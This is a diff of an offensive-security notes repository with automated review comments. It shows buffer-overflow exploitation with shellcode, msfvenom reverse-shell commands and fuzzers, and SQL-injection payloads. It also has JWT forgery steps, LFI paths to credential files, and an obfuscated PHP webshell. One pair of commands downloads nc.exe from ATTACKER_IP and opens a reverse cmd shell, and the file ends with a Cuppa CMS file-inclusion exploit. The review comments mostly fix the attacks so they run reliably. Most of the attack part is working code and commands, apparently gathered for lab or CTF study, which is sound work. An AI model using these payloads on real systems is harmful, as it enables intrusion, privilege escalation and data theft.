* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
```
* Prepend NOPs as padding before shellcode
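Review bot: Two commands will not run as typed: `python -c "print('A' * 3000)` is missing its closing `"`, and the Linux msfvenom line drops the `>` after `<attacker-ip`. Both msfvenom examples pass only `-b "\x00"`, yet the bad-character section above exists precisely to extend that list; say `-b "\x00<every bad char found with mona compare>"` or the encoded payload will still contain them. For the Windows payload add `EXITFUNC=thread` so the shell exiting does not take the whole service with it, which matters when you want to reconnect without a crash. I do not find an `msfpattern` command in mona; the documented one is `!mona pc <bufferlength>` (alias of `pattern_create`), and it takes the `!` prefix like the other mona lines here.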

@ -0,0 +1,121 @@
# Return Address reuse
## via Shellcode, an examples
* Find out the address of the start of the buffer and the start address of the return address
* Calculate the difference between these addresses so you know how much data to enter to overflow
* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
* Plus NOPsled (sometimes xargs is needed in front of the app call)
```python
python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
```
## Finding Offset
### via gdb segfault output
* 64 bit addresses use 6 out of 8 byte for addresses.
```sh
gdb ./application
run $(python -c "print('\x41' * 180)")
```
* Return address hit completely when 6 bytes are filled.
```sh
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in copy_arg ()
```
* Buffer = measured_length - (`$rbp` + 6 bytes return address)
### via metasploit
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l 180
```
* Looking for `rbp` Content in front of the return address to measure offset
```sh
(gdb) i r
[...]
rbp 0x<rbpAddress> 0x<rbpConent>
[...]
```
* Measure offset
```sh
pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
```
## Crafting Payload
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
* Inside gdb
```sh
run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
```
* Check actual stack
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141
0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
[...]
```
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
## NopSled
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
```
* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
```sh
run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
```
## setuid() and setreuid()
* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
* `/bin/sh` checks real uid not effective uid
* ./shellcodes/setuid_shell.as
### setreuid() in assembler
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
* ./shellcode/setreuid_shell.as
```sh
"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
```
* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
### setreuid() in shellcode using pwntools
* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
```sh
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
shellcraft -f d amd64.linux.setreuid
```
* The uid can be set as an argument
```sh
shellcraft -f d amd64.linux.setreuid <uid>
```
* Prepend this in front of the existing shellcode like this
```sh
run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
```
* Where the existing shellcode is the following
```sh
\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
```
* Setreuid part is the following
```sh
\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
```
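Review bot: The stack addresses being reused (`0x7fffffffe2a8`, `0x7fffffffe288`) are only stable because gdb disables ASLR and sets its own environment; outside gdb the binary needs `setarch $(uname -m) -R ./application` (or ASLR off system-wide) and the address still shifts with environment size, which is exactly why the NOP sled is there — say so next to the little-endian step. Every `python -c "print(...)"` here assumes Python 2: Python 3's `print` writes `\x90` as the two-byte UTF-8 sequence and corrupts the payload, so use `python2` or `sys.stdout.buffer.write(b'...')`, and remember that `$(...)` word-splits on spaces, tabs and newlines, so shellcode containing `\x20`, `\x09` or `\x0a` breaks too. The `pattern_offset` path is truncated to `pt/metasploit/...`, and the `* [Linux Syscall Table]` bullet has landed inside the shellcraft code fence. Worth one line on why writing only 6 bytes of the return address works: the two high bytes left over from the original return address are already zero (see the `0x00007fff` words in the dump), so the result is still a canonical address.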

@ -0,0 +1,23 @@
xor rdi,rdi <------ set the rdi to 0
xor rax,rax
xor rsi, rsi <------ set the rsi to 0
mov si, 1002 <------ put the value 1002 in the lower bits of the rsi
mov di, 1002 <------ put the value 1002 in the lower bits of the rdi
mov al,0x71 <------ put the setruid function in the al register
syscall <------ call the function.
xor rdx,rdx
movabs rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rdi,rsp
xor rax,rax
push rax
push rdi
mov rsi,rsp
mov al,0x3b
syscall
push 0x1
pop rdi
push 0x3c
pop rax
syscall
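Review bot: The comment `put the setruid function in the al register` should read `setreuid`, and it is worth saying that `mov al,0x71` only selects the right syscall because `rax` was zeroed two lines earlier — a stray upper byte would call something else. `mov si, 1002` / `mov di, 1002` encode the uid as an immediate (`\xea\x03` in the dumped bytes), so anyone adapting this to another uid must re-check the encoding for bad characters; a comment marking `1002` as the engagement-specific value would flag that. The tail `push 0x1; pop rdi; push 0x3c; pop rax; syscall` is an `exit(1)` that is only reached if `execve` fails, which a one-line comment would make clear.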

@ -0,0 +1,37 @@
etuid(0) + execve(/bin/sh) - just 4 fun.
xi4oyu [at] 80sec.com
main(){
__asm( "xorq %rdi,%rdi\n\t"
"mov $0x69,%al\n\t"
"syscall \n\t"
"xorq %rdx, %rdx \n\t"
"movq $0x68732f6e69622fff,%rbx; \n\t"
"shr $0x8, %rbx; \n\t"
"push %rbx; \n\t"
"movq %rsp,%rdi; \n\t"
"xorq %rax,%rax; \n\t"
"pushq %rax; \n\t"
"pushq %rdi; \n\t"
"movq %rsp,%rsi; \n\t"
"mov $0x3b,%al; \n\t"
"syscall ; \n\t"
"pushq $0x1 ; \n\t"
"pop %rdi ; \n\t"
"pushq $0x3c ; \n\t"
"pop %rax ; \n\t"
"syscall ; \n\t"
);
}
*/
main() {
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
"\x58\x0f\x05";
(*(void (*)()) shellcode)();
}
2009-05-14
evil.xi4oyu
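Review bot: The test harness will segfault on any current distro unless it is built with `gcc -z execstack -fno-stack-protector -o sc sc.c`, because `shellcode[]` lives on a non-executable stack and `(*(void (*)()) shellcode)();` jumps into it; a comment with the build line belongs above `main`. `main()` with an implicit `int` return type is an error under GCC 14+, so write `int main(void)`. Also worth noting that `mov $0x69,%al` is `setuid` (syscall 105), so this variant only yields root from a setuid-root binary — the `setreuid` listing in this commit is the one to use for an arbitrary target uid. The leading `etuid(0)` line looks like a truncated `/* setuid(0)` comment opener; the file as rendered has a closing `*/` with no opening.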

@ -0,0 +1,24 @@
#!/usr/bin/env python
import sys, time, socket
ip = "192.168.56.102"
port = 31337
timeout = 5
prefix = ""
counter = 100
string = prefix + "A" * counter
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ip, port))
print ('[+] Sending buffer')
#s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string + '\r\n', "latin1"))
s.recv(1024)
except:
print ("[!] The program can't be reached")
sys.exit(0)
string += counter * 'A'
time.sleep(1)
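Review bot: `timeout = 5` is defined but never applied, so if the target crashes without closing the socket the `s.recv(1024)` blocks forever and the fuzzer never reports the crashing length — add `s.settimeout(timeout)` right after the socket is created. The bare `except:` also catches `KeyboardInterrupt` and then prints that the program can't be reached; catch `(OSError, socket.timeout)` instead and print `len(string)` in the handler, since that number is the whole point of the run. The `from __future__`-style python2/3 mix is avoided here, but `s.send` should still be `s.sendall` once the buffer grows past a few kilobytes.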

@ -0,0 +1,24 @@
#!/usr/bin/env python2
import sys,socket
import time
address = '192.168.56.102'
port = 9999
buffer = ['A']
counter = 100
while len(buffer) < 10:
buffer.append('A'*counter)
counter=counter+100
try:
for string in buffer:
print '[+] Sending %s bytes...' % len(string)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((address,port))
s.send(string + '\r\n')
s.recv(1024)
print '[+] Done'
except:
print '[!] Unable to connect to the application. You may have crashed it.'
sys.exit(0)
finally:
s.close()
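Review bot: A new socket is created on every loop iteration but only the last one is closed in `finally`, so eight connections are left open on the target while fuzzing; move `s.close()` to the end of the loop body (or use `with`). The crash message is printed without the length that caused it — `print '[!] Crashed at %s bytes' % len(string)` is the value the next step needs. `while len(buffer) < 10` caps the run at 900 bytes, which is fine for the target this was written for but should be a named constant with a comment, and the bare `except:` masks Ctrl-C as a crash.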

@ -0,0 +1,31 @@
#!/usr/bin/env python3
import socket, time, sys
ip = "10.10.161.147"
port = 9999
timeout = 5
prefix = ""
string = prefix + "A" * 100
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
s.recv(1024)
s.send("User" '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
s.send(string + '\r\n')
#print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
print(f"fuzzing with {len(string)} bytes")
except:
#print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)
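Review bot: `s.send("User" '\r\n')` and `s.send(string + '\r\n')` pass `str` to a Python 3 socket, which raises `TypeError` on the first iteration; the bare `except:` then swallows it and `sys.exit(0)` exits silently, so this fuzzer never sends anything and prints nothing. Use `s.sendall(b"User\r\n")` and `s.sendall(bytes(string + "\r\n", "latin-1"))`, and delete the earlier `s.send(bytes(string, "latin-1"))` which sends the same buffer twice. The except handler should also print `len(string)` before exiting, since the crashing length is what the run is for, and should catch `(OSError, socket.timeout)` rather than everything.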

@ -0,0 +1 @@
Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43

@ -0,0 +1,8 @@
import pwn
r = pwn.remote("10.10.156.228", 9999)
r.recvuntil(":")
r.send("User\r\n")
r.recvuntil(":")
r.send(b'A' * 2200)
r.recvuntil("message:")
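Review bot: The script mixes `str` (`":"`, `"User\r\n"`, `"message:"`) and `bytes` (`b'A' * 2200`) on the same tube; pwntools 4 coerces the strings, but doing it consistently with `b":"`, `r.sendline(b"User")` and `b"message:"` removes the dependence on that coercion. It ends right after the last `recvuntil`, without `r.interactive()` or `r.close()`, which is presumably deliberate for a crash test — a one-line comment saying "expects the service to die here" would make that clear.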

@ -0,0 +1,3 @@
# Pwntools
* [Docs](https://docs.pwntools.com/en/stable/)

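--- a/exploit/python/scapy.md
+++ b/exploit/python/scapy.md
@@ -0,0 +1,4 @@
+# Scapy
+* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)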

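--- a/exploit/samba/smbmap
+++ b/exploit/samba/smbmap
@@ -0,0 +1 @@
+Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003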

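--- a/exploit/samba/smbmap.md
+++ b/exploit/samba/smbmap.md
@@ -0,0 +1,12 @@
+# smbmap
+* [Repo](https://github.com/ShawnDEvans/smbmap.git)
+* `python3 -m pip install -r requirements.txt`
+# Usage
+* `-x` execute command on server
+* `-s` enumerate share
+```sh
+smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
+```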
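Review bot: `-s` in smbmap takes the name of a share to operate on (`-s C$`); it does not enumerate shares — running smbmap with only `-H`/`-u`/`-p` lists shares and their permissions, and `-r <share>` lists a share's contents. `-x` runs the command through the admin shares and therefore needs local-administrator credentials, and it creates a service or WMI process on the target, so it is the loudest option in the tool; both facts belong next to the example. The password on the command line also lands in shell history; `-p` can be omitted to be prompted.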

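--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@@ -0,0 +1,86 @@
+# SQL Injection
+# Finding an Opportunity
+* GET parameter
+```sh
+http://example.com/index.php?id=' or 1=1 -- -
+```
+* Provoke error to gain information
+```sh
+http://example.com/index.php?id='
+```
+# Usage
+* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
+```sql
+SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
+SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
+```
+* Boolean True and False
+```sql
+SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
+SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
+```
+* Blind injection // Guessing characters
+```sh
+http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
+```
+### Union based
+* Check number of cols
+```sql
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--
+# until the error occurs
+```
+* Check which one is a string
+```sql
+' UNION SELECT 'a',NULL,NULL,NULL--
+' UNION SELECT NULL,'a',NULL,NULL--
+' UNION SELECT NULL,NULL,'a',NULL--
+' UNION SELECT NULL,NULL,NULL,'a'--
+```
+* Retrieve content, for cols and comment two times as an example. Or dump database
+```sql
+' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
+' UNION SELECT NULL,username,password,NULL FROM users -- //
+```
+* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
+## Tools
+### SQLmap
+* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
+* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
+* Use `-r` with a saved HTTP request
+```sh
+sqlmap -r request.txt --dbms=mysql --dump
+sqlmap -r request.txt --batch
+```
+|Parameter|Details|
+|-r|Uses the intercepted request save as a file|
+|--dbms|DBMS of target|
+|--dump|Dump the entire database|
+|--dump-all|Dump everything|
+|-p |TESTPARAMETER|
+|--os-shell|Prompt for an interactive operating system shell|
+|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
+### Damn Small SQLi Scanner (DSSS)
+* [Script](https://github.com/stamparm/DSSS.git)
+```sh
+python dsss.py -u "http://example.com/index.php?id="
+```
+### Online sqlmap
+* [Link](https://suip.biz/?act=sqlmap)
+## Payloads
+* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)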
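Review bot: The "Online sqlmap" entry (suip.biz) sends the target URL, the captured request and whatever is extracted through a third party, which is outside the rules of engagement of almost any authorised test and leaks client data — drop it or mark it as not for client work. The blind example `1' substr((select database()),1,1)) < 105 --+` has an unbalanced parenthesis and no boolean operator; the usual form is `1' and ascii(substr((select database()),1,1)) > 105 --+`. The illustrative queries use `password := '...`, which is not SQL and hides the point that the quote terminates the string — `WHERE username='admin' AND password='' OR 1=1 -- -'` shows it directly. The sqlmap parameter table is missing the `|---|---|` separator row, so it will not render as a table.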

@ -0,0 +1,4 @@
# Sudo pwnge with pwfeedback()
* Sudo version 1.7.1 to 1.8.30
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)

1
exploit/web/beef Submodule

@ -0,0 +1 @@
Subproject commit 15af383355e87428a54251664feca7004a21e291

1
exploit/web/csrf.md Normal file

@ -0,0 +1 @@
# CSRF


@ -0,0 +1,23 @@
# Forced Browsing
Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note.
## Usage
## Tools
### wfuzz
* `pip install wfuzz`
```
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
```
|Parameter|Detail|
|---------|------|
|-c|Shows the output in color|
|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
|--hc|Don't show certain http response codes|
|--hl|Don't show a certain amount of lines in the response|
|--hh|Don't show a certain amount of words|
|--hw|Don't show word response return val of this length|

3
exploit/web/idor/idor.md Normal file

@ -0,0 +1,3 @@
# Insecure Direct Object Reference (IDOR)
Changing URL parameters.

@ -0,0 +1 @@
Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61

88
exploit/web/jwt/jwt.md Normal file

@ -0,0 +1,88 @@
# JSON Web Token
## Build up
```sh
header.payload.signature
```
1. **Header**: This consists of the algorithm used and the type of the token.
```sh
{ "alg": "HS256", "typ": "JWT"}
```
2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
## NONE Algorithm Vulnerability
* Example with `alg: NONE`, so no third part is needed.
```sh
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
```
* Encoded headers are as follows
* `{"type": "JWT", "alg": "none"}`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
```
* `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
```
## Brute Force
```python
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
```
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
|Parameter|Details|
|---------|-------|
|Token | The HS256 JWT Token|
|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
|max-length|Secret max length (default: 12)|
```sh
[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
Attempts: 100000
Attempts: 200000
Attempts: 300000
SECRET FOUND: pass
Time taken (sec): 11.605
Attempts: 346830
```
## HS256 Vulnerability
It is calculated by using server `K_pub`, which may be gained via content of the server cert
### Build Up
* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
```sh
$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
```
* Encoding the payload, no spaces inbetween. Cut `==` at the end.
```sh
echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ==
```
* Crafting the HMAC signature
* Convert `K_pub` file to hex
```sh
cat id_rsa.pub | xxd -p | tr -d "\\n"
```
* Sign the message to get the signature as hex value
```sh
echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
```
* Decode hex to binary data and reencode as base64 via python
```python
python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")"
```
## Tools
* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
* https://jwt.io

@ -0,0 +1 @@
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da

1
exploit/web/jwt_header Normal file

@ -0,0 +1 @@
{"typ": "JWT", "alg": "HS256"}


@ -0,0 +1,19 @@
# Local File Inclusion
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).
## Usage
* Exploit URL parameter
```
http://example.com/home?page=about.html
```
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
```


@ -0,0 +1,17 @@
We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
* An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
* If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
* Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
* As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
* Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.


@ -0,0 +1,35 @@
# PHP Payload in Image ExifData
* Test
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```
* Build Payload with AV evasion
```sh
<?php
$cmd = $_GET["wreath"];
if (isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
```
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`
## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```


@ -0,0 +1,9 @@
# Re-registration
Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.
# Usage
* Re-register. The name is taken, that's the point, but alter the string
```
try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.
```


@ -0,0 +1,87 @@
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
